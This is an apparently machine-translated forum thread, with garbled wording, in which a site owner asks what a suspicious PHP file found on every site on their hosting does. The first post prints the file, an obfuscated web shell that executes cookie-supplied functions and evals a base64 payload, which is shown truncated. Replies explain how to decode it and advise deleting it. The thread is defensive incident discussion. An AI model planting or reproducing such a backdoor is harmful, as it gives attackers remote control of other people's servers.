1

Topic: Virus on a site

Hello. On a site there was a file wp-desember.php.
How it is safe to learn, what it does, and whether it "did" something? Still a question, whether it is possible kaki-or - or image  how the server has been cracked? The matter is that the file appeared on all sites on a hosting, and there them from tens, beginning from  and  and finishing .
File contents:

<? php
if (isset ($ _COOKIE ["id"])) $ _COOKIE ["user"] ($ _COOKIE ["id"]);
$auth_pass = "d41f30ec49e9". "1e9a01ed6df1". "eab25fb0";
$color = "#d". "f5";
$default_action = ' Fi '.'les'.'Man ';
$default_use_ajax = false;
$default_charset = ' ut '.'f-8 ';
$ecode = "uns". "er". "ia". "li". "ze". "(trim (base". "64_de". "co". "de";
$database = ' YToxNTE1OntpOjA7czo1NjoiYVdZb0lXVnRjSFI1S0NSZlUwVlNWa............................
oWTNScGIyNG5JQzRnSkY5UVQxTlVXeWRoSjEwcE93PT0iO2k6MTUxNDtzOjg6IlpYaHBkRHM9Ijt9 ';
//(a line in some tens lines)
print eval (implode ("\n", array_map (' base64_decode ', unserialize (trim (base64_decode ($database))))));

2

Re: Virus on a site

print_r (array_map (' base64_decode ', unserialize (trim (base64_decode ($database)))));

here the code which is launched

3

Re: Virus on a site

SharuPoNemnogu wrote:

print_r (array_map (' base64_decode ', unserialize (trim (base64_decode ($database)))));

here the code which is launched

Something is clear nothing... Approximately can tell its assignment?
File in nesting

4

Re: Virus on a site

Here in a spoiler thrust that deduces

5

Re: Virus on a site

astalavistabest wrote:

it is passed...
Something is clear nothing... Approximately can tell its assignment?
File in nesting

And what for
Did not open a file but I know that assignment especially suffocating.
It is absolutely not important. It is important that you should delete all another's code.